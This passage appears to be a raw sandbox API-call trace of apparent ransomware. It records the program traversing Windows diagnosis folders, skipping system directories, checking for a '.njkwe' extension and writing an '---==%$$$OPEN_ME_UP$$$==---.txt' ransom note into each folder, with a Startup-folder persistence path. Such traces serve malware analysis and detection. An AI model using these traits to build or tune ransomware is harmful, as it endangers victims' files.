dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.385] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc780ec0e, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e4a4f18, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb806a476, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x43ad, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", cAlternateFileName="FFFD8B~1.XML")) returned 1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="Windows") returned -1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="$Recycle.bin") returned 1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="System Volume Information") returned -1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="Program Files") returned -1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="Program Files (x86)") returned -1 [0073.385] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml") returned 96 [0073.385] StrStrIW (lpFirst="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpSrch=".njkwe") returned 0x0 [0073.385] lstrcmpW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.385] lstrcmpW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpString2="taridd") returned -1 [0073.385] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\fffd8b5d-0172-4719-a792-b7c76986459d_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.385] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc780ec0e, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e4cb173, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb819b5fa, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4443, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", cAlternateFileName="FFFD8B~2.XML")) returned 1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="Windows") returned -1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="Program Files") returned -1 [0073.385] lstrcmpiW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.385] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml") returned 100 [0073.386] StrStrIW (lpFirst="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.386] lstrcmpW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.386] lstrcmpW (lpString1="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpString2="taridd") returned -1 [0073.386] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.386] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.386] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc780ec0e, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e4cb173, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb819b5fa, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4443, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fffd8b5d-0172-4719-a792-b7c76986459d_withdraw.xml", cAlternateFileName="FFFD8B~2.XML")) returned 0 [0073.386] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0073.386] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 82 [0073.387] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.387] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.388] CloseHandle (hObject=0x430) returned 1 [0073.388] GetProcessHeap () returned 0xbe0000 [0073.388] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.388] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4e4cb173, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 1 [0073.388] lstrcmpiW (lpString1="SoftLandingStage", lpString2="Windows") returned -1 [0073.388] lstrcmpiW (lpString1="SoftLandingStage", lpString2="$Recycle.bin") returned 1 [0073.388] lstrcmpiW (lpString1="SoftLandingStage", lpString2="System Volume Information") returned -1 [0073.388] lstrcmpiW (lpString1="SoftLandingStage", lpString2="Program Files") returned 1 [0073.388] lstrcmpiW (lpString1="SoftLandingStage", lpString2="Program Files (x86)") returned 1 [0073.389] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage") returned 55 [0073.389] lstrcmpW (lpString1="SoftLandingStage", lpString2=".") returned 1 [0073.389] lstrcmpW (lpString1="SoftLandingStage", lpString2="..") returned 1 [0073.389] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.389] GetProcessHeap () returned 0xbe0000 [0073.389] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.389] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\*") returned 57 [0073.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4e4cb173, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0073.389] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.389] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.389] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.389] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.389] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.389] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\.") returned 57 [0073.389] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.389] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.389] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.389] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.389] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.389] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlandingstage\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.474] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4e4cb173, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.474] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.474] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.475] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\..") returned 58 [0073.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.475] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.475] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.475] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.475] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.475] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.475] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4e4cb173, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.475] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0073.475] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 87 [0073.475] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlandingstage\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.475] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.476] CloseHandle (hObject=0x430) returned 1 [0073.476] GetProcessHeap () returned 0xbe0000 [0073.476] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.476] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xd6b11c43, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd6b11c43, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="TenantStorage", cAlternateFileName="TENANT~1")) returned 1 [0073.476] lstrcmpiW (lpString1="TenantStorage", lpString2="Windows") returned -1 [0073.476] lstrcmpiW (lpString1="TenantStorage", lpString2="$Recycle.bin") returned 1 [0073.476] lstrcmpiW (lpString1="TenantStorage", lpString2="System Volume Information") returned 1 [0073.476] lstrcmpiW (lpString1="TenantStorage", lpString2="Program Files") returned 1 [0073.477] lstrcmpiW (lpString1="TenantStorage", lpString2="Program Files (x86)") returned 1 [0073.477] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage") returned 52 [0073.477] lstrcmpW (lpString1="TenantStorage", lpString2=".") returned 1 [0073.477] lstrcmpW (lpString1="TenantStorage", lpString2="..") returned 1 [0073.477] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.477] GetProcessHeap () returned 0xbe0000 [0073.477] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.477] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\*") returned 54 [0073.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xd6b11c43, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd6b11c43, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0073.477] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.477] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.477] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.477] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\.") returned 54 [0073.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.477] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.477] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.477] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.477] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\tenantstorage\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.477] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xd6b11c43, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd6b11c43, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.477] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\..") returned 55 [0073.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.478] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.478] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.478] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.478] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.478] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.478] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6b11c43, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd6b11c43, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd6b37da3, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="P-ARIA", cAlternateFileName="")) returned 1 [0073.478] lstrcmpiW (lpString1="P-ARIA", lpString2="Windows") returned -1 [0073.478] lstrcmpiW (lpString1="P-ARIA", lpString2="$Recycle.bin") returned 1 [0073.478] lstrcmpiW (lpString1="P-ARIA", lpString2="System Volume Information") returned -1 [0073.478] lstrcmpiW (lpString1="P-ARIA", lpString2="Program Files") returned -1 [0073.478] lstrcmpiW (lpString1="P-ARIA", lpString2="Program Files (x86)") returned -1 [0073.478] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\P-ARIA") returned 59 [0073.478] lstrcmpW (lpString1="P-ARIA", lpString2=".") returned 1 [0073.478] lstrcmpW (lpString1="P-ARIA", lpString2="..") returned 1 [0073.478] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\P-ARIA", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.478] GetProcessHeap () returned 0xbe0000 [0073.478] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.478] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\P-ARIA\\*") returned 61 [0073.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\P-ARIA\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="", cAlternateFileName="陠Â￿￿扨@￿￿陠Â\x05")) returned 0xffffffff [0073.479] GetProcessHeap () returned 0xbe0000 [0073.479] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.479] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6b11c43, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd6b11c43, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd6b37da3, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="P-ARIA", cAlternateFileName="")) returned 0 [0073.479] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0073.479] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 84 [0073.479] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\TenantStorage\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\tenantstorage\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.480] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.481] CloseHandle (hObject=0x430) returned 1 [0073.481] GetProcessHeap () returned 0xbe0000 [0073.481] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.481] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x774ff760, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb85cc8d2, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb85cc8d2, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="VortexSchemaRequests.dat", cAlternateFileName="VORTEX~1.DAT")) returned 1 [0073.481] lstrcmpiW (lpString1="VortexSchemaRequests.dat", lpString2="Windows") returned -1 [0073.481] lstrcmpiW (lpString1="VortexSchemaRequests.dat", lpString2="$Recycle.bin") returned 1 [0073.481] lstrcmpiW (lpString1="VortexSchemaRequests.dat", lpString2="System Volume Information") returned 1 [0073.481] lstrcmpiW (lpString1="VortexSchemaRequests.dat", lpString2="Program Files") returned 1 [0073.481] lstrcmpiW (lpString1="VortexSchemaRequests.dat", lpString2="Program Files (x86)") returned 1 [0073.481] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\VortexSchemaRequests.dat") returned 63 [0073.481] StrStrIW (lpFirst="VortexSchemaRequests.dat", lpSrch=".njkwe") returned 0x0 [0073.481] lstrcmpW (lpString1="VortexSchemaRequests.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.481] lstrcmpW 